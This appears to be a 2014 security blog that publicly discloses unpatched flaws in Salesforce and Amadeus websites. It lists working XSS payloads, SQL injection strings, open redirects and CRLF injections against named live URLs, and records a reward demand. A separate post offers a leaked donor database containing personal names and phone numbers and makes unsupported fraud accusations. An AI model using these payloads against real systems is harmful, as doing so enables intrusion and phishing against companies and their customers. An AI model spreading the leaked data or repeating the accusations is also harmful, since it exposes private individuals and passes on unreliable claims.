Wednesday, January 22, 2014

Sales Force - Public Disclosure

Public Disclosure - SalesForce
They didn't reply back to answer whether or not they would offer a bounty If report bugs to them under Responsible Disclosure Policy. On their website, they say that they don't offer bug bounties and no Hall of Fame. Can you believe it? No Hall of Fame!
Cross site scripting & Breach attack in 2 sub-domains of SalesForce.
1. Cross-site Scripting
a) Domain: appexchangejp.salesforce.com
PoC: https://appexchangejp.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_920358'():;WhiteHatMrNervous
Vulnerable Parameter: tab
b) Domain: appexchange.salesforce.com
PoC: https://appexchange.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_942833'():;WhiteHatMrNervous
Vulnerable Parameter: tab
2. BREACH attack
a) Domain: appexchange.salesforce.com
PoC: https://appexchange.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_938289
Vulnerable Parameter: tab 
PoC Screenshots:-http://www.mirrorupload.net/file/Z1QWL06L/#!SalesForce.zip
Posted by at No comments:
Labels:

Tuesday, January 21, 2014

Amadeus IT Group - Public Disclosure

Public Disclosure - Amadeus IT Group
Download PoC & Conversation screenshots:-
Password for PDF: whiteHatMrNervous
Summary:
Date First Contacted:December 27, 2013
Reward demanded:USD 21,000
Any Reward Paid:No
Communication Channel:Company rep only conversed via blog comments, gmail and hotmail ID, screenshots attached. Never used their official email, but traced IP of blog comment to Amadeus SAAS, FR
Vulnerability ListSQL Injection, Cross site scripting, HTTP Parameter Pollution, CRLF Injection, Open Redirect, Unicode transformation Issues
Infected object:Main website & sub-domains
Retest Infection:Definitely will
Leaked database dump/files:None
Received Respect:No
Received Appreciation for Intimation about Existence of Security Vulnerabilities:No
Hall of Fame:No
Amadeus IT Group (your technology partner) – Transaction processor for the global travel and tourism industry.
Amadeus IT Group is the most used GDS (Global Distribution System, France based, Germany influenced) by Travel & Tour companies. Amadeus IT Group stores confidential client data in plain text on their servers. This data is stored and used by Travel & tour companies that operate Amadeus GDS. Amadeus GDS has a feature called client profile, wherein each employee of the company can create/access/modify data of their companies clients. This data includes Full name, date of birth, address, Passport & visa details, Credit card numbers with pin and expiry details. Their web service and GDS application is also vulnerable to stack overflow, remote code execution, etc. And their website is vulnerable to what-so-ever is mentioned below. Amadeus IT Group is a virgin, only is known largely by and in Travel & Tour industry. Hence, Hat Hackers never audited security of Amadeus IT Group and its various products.
A] Cross Site Scripting (Amadeus XSS)
1.       URL: amadeus.com/cgi-bin/appl/list.pl [Get]
Infected Parameters: 3 (whiteHatMrNervous reflected in returned source code)
?cat_nr=C97F6457-8274-43D5-8942-2C17F30D8DBA” onmouseover=prompt(whiteHatMrNervous) bad=”
?job_nr=8F3C4897-6F62-40BE-83C2-A802C5AA201E–><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!–
?loc_nr=6DC8EDF4-30C5-11D4-B90E-0050BAE619BE–><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!–
2.       URL: amadeus.com/linkhotel/nominate-hotel.html [POST (multipart) input]
Infected Parameters: 9 (whiteHatMrNervous reflected in returned source code)
?city=San Francisco” onmouseover=prompt(whiteHatMrNervous) bad=”
?clients_corporations=1″ onmouseover=prompt(whiteHatMrNervous) bad=”
?company=MatchMeCupidCheatsFreelancers” onmouseover=prompt(whiteHatMrNervous) bad=”
?email=SalesForce@hasXSS.com” onmouseover=prompt(whiteHatMrNervous) bad=”
?first_name=AmadeusXSS” onmouseover=prompt(whiteHatMrNervous) bad=”
?last_name=HackersParadise” onmouseover=prompt(whiteHatMrNervous) bad=”
?rate_access_code=94102″ onmouseover=prompt(whiteHatMrNervous) bad=”
?telephone=555-666-0606″ onmouseover=prompt(whiteHatMrNervous) bad=”
?top_locations=1″ onmouseover=prompt(whiteHatMrNervous) bad=”
3.       URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?srchfor=0_978176%26quot;():; whiteHatMrNervous
4.       URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp [Get]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?lastname=del”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?postalcode=94102″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?province=NY”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?username=whiteHatMrNervous”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
5.       URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?start=1′sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=’>
6.       URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp [Get]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?btn=dosrch”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?keywords=1″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?srchfor=0′sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=’>
?wrd=1″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
7.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?nodetree=choosesite”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
B] SQL Injection
1.       URL: amadeus.com/cgi-bin/appl/list.pl
Infected Parameters: 3
?cat_nr=1′”
?job_nr=1′”
?loc_nr=1′”
2.       URL: myamadeus.net/homepage.aspx
Infected Parameter: 2
?ctl00%24txtPwd=’+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+’
?ctl00%24txtUserid=’+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+’
C] Open Redirect
1.       URL: amadeus.com/corpweb/amaweb1camp.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
2.       URL: amadeus.com/corpweb/eformstawfv2.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
3.       URL: amadeus.com/corpweb/eformstowf.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
4.       URL: amadeus.com/corpweb/hotelcampaignsen.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
5.       URL: amadeus.com/corpweb/newsletters_cars_forms.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
6.       URL: amadeus.com/corpweb/online_traveller_study_event.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
E] CRLF Injection
1.       URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?siteid=SomeCustomInjectedHeader:injected_by_whiteHatMrNervous
2.       URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp
Infected Parameter: 1
?start=SomeCustomInjectedHeader:injected_by_ whiteHatMrNervous
3.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp
Infected Parameter: 1
?nodetree=SomeCustomInjectedHeader:injected_by_ whiteHatMrNervous
F] Unicode transformation issues
1.       URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?address1= whiteHatMrNervous9929%C0%BEz1%C0%BCz2a%90bcxyyy9929
2.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=pcjndrci&address1=acux9929>z1<z2a%EF%BF%BDbcxuca9929&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?city= whiteHatMrNervous1690%C0%BEz1%C0%BCz2a%90bcxyyy1690
3.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=tbewfsld&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=acux1690>z1<z2a%EF%BF%BDbcxuca1690&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?country= whiteHatMrNervous8949%C0%BEz1%C0%BCz2a%90bcxyyy8949
4.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ldsbvqpp&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=acux8949>z1<z2a%EF%BF%BDbcxuca8949&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?familiarname= whiteHatMrNervous3871%C0%BEz1%C0%BCz2a%90bcxyyy3871
5.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=acux3871>z1<z2a%EF%BF%BDbcxuca3871&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?firstname= whiteHatMrNervous9454%C0%BEz1%C0%BCz2a%90bcxyyy9454
6.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=acux9454>z1<z2a%EF%BF%BDbcxuca9454&lastname=del&familiarname=ibxwwpis&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?Language= whiteHatMrNervous3664%C0%BEz1%C0%BCz2a%90bcxyyy3664
7.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ndomggee&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=acux3664>z1<z2a%EF%BF%BDbcxuca3664&Activity=-1&site=Europe&nodetree=choosesite
?lastname= whiteHatMrNervous1260%C0%BEz1%C0%BCz2a%90bcxyyy1260
8.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=acux1260>z1<z2a%EF%BF%BDbcxuca1260&familiarname=ghdjqguv&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?postalcode= whiteHatMrNervous3683%C0%BEz1%C0%BCz2a%90bcxyyy3683
9.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=sngjchwn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=acux3683>z1<z2a%EF%BF%BDbcxuca3683&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?province= whiteHatMrNervous9518%C0%BEz1%C0%BCz2a%90bcxyyy9518
10.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=jokctcch&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=acux9518>z1<z2a%EF%BF%BDbcxuca9518&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?site= whiteHatMrNervous9340%C0%BEz1%C0%BCz2a%90bcxyyy9340
11.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=iiaukhmo&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=acux9340>z1<z2a%EF%BF%BDbcxuca9340&nodetree=choosesite
?username= whiteHatMrNervous3710%C0%BEz1%C0%BCz2a%90bcxyyy3710
12.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username= whiteHatMrNervous3710>z1<z2a%EF%BF%BDbcxyyy3710&firstname=del&lastname=del&familiarname=lfbykbbn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
13.       URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp?start= whiteHatMrNervous9935%C0%BEz1%C0%BCz2a%90bcxyyy9935
14.       URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket.jsp?start= whiteHatMrNervous9935%3Ez1%3Cz2a%FDbcxyyy9935
15.       URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp?btn= whiteHatMrNervous2700%C0%BEz1%C0%BCz2a%90bcxyyy2700
16.       URL: alc.amadeus.com/ilearn/en/learner/jsp/search_all.jsp?aor=0&btn=acux2700%C0%BEz1%C0%BCz2a%90bcxuca2700&cert=A&col=0&CompetencyId=&datechoice=S&daterng=1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?keywords= whiteHatMrNervous7201%C0%BEz1%C0%BCz2a%90bcxyyy7201
17.       URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=acux7201%C0%BEz1%C0%BCz2a%90bcxuca7201&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?srchfor= whiteHatMrNervous5083%C0%BEz1%C0%BCz2a%90bcxyyy5083
18.       URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=advsrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=acux5083%C0%BEz1%C0%BCz2a%90bcxuca5083&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?wrd= whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
19.       URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd= whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Elizabeth Susan Carter – Photography
Store: http://goo.gl/kEa7ul
Facebook: http://goo.gl/mFei5t
Contact: http://goo.gl/ulA9Lm
About: http://goo.gl/pwPdiq
PortFolio:-
Posted by at No comments:
Labels:

Monday, January 20, 2014

Nirmal Baba - Fraud

Target Audience – India [Closed, database+files shared publicly]
Download link for leaked files & database in excel:-
Password for zip: whiteHatMrNervous
Nirmal Baba / Nirmal Darbar / Nirmal Baba Samagam is nothing but a clever idea of a corrupted political party which is converting their black money to white money. In India, there are no taxes on donations. Hence the corrupted political party hired people to act as fake followers, in order to make the identity of Nirmal Baba famous. After the man gets the tag of a ‘Baba’, the corrupted political party starts depositing money in cash in form of Donations. In metro cities, everyone knows that the ‘Nirmal Baba’ is a cheat and not a Baba, Hence no real following, all paid & fake followers.
In 2011, month September & October, the fake Nirmal Baba gets donation of more than INR 20,000,000. The corrupted political party is converting its black money into white at a very fast rate.
I have their database & will publish it on 30 Jan’14. Here is their DB structure for table having data of Donator’s:
phpMyAdmin SQL Dump v3.3.9
localhost:3306
Database: `payfee`
CREATE TABLE IF NOT EXISTS `pnboriginalpayfee` (`id` int(11) NOT NULL AUTO_INCREMENT,
`payfeeid` text,`name` text,`mobile` text,`purposecode` text,`purpose` text,`city_code` text,`samagam_city` text,`payment_mode` text,`amount` int(11) DEFAULT NULL,`submitdate` date DEFAULT NULL,`matchpayfee` int(11) NOT NULL DEFAULT ’0′,PRIMARY KEY (`id`)) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=10886 ;
The database shows they got donations from 10908 people or 10908 times from 27 Aug’11 – 25 Oct’11. Name & Phone number do not correspond to each other, have checked in TrueCaller app. Hence, I can call them as fake entries, real cash.
Posted by at No comments:
Labels:

Friday, January 10, 2014

Sales Force - Vulnerability

[Closed, Vulnerabilities disclosed publicly]

Target Audience – Customers of SalesForce
SalesForce a sub of Force, encourages security researchers to come forward and report bugs in their websites to them while also adhering to Responsible disclosure policy.
But they offer no reward, no compensation for bug reporting. No hall of fame either. This creates disinterest among researchers and discourages them to report bugs, hence some sell it to hackers and some post it publicly.
As a customer of SalesForce, you should be aware that all your data online is not safe. I have found Cross site scripting (XSS) bug in multiple of their sub domains & BREACH attack.
I don’t want anyone to exploit, hence I will report to them after Public disclosure. Either way, they will get bug details.
Posted by at No comments:
Labels:

Amadeus IT Group - Vulnerability

[Closed, Vulnerabilities disclosed publicly]
Target Audience - Travel & Tour Companies across the globe.
Surprisingly, Your technology partner & GDS provider Amadeus is vulnerable to severe bugs like SQL injection (blind), Cross site scripting, Open Redirect, CSRF, etc.
More interestingly, it doesn't wants to know about the bugs nor fix them. Multiple of their websites are vulnerable.
JO* Jump Out, I have now started testing their GDS and web service for security vulnerabilities along with ongoing search for bugs in their websites.
An exploiter may send an email to Users of Amadeus GDS across the globe containing links that point towards legit websites of Amadeus IT Group. When clicked, the user may be redirected to Phishing / Malware site or something more creative, focused to steal financial data. We can achieve this by exploiting existing XSS, SQL Injection & Open Redirect vulnerabilities on any of their websites.
Posted by at No comments:
Labels:
Subscribe to: Posts (Atom)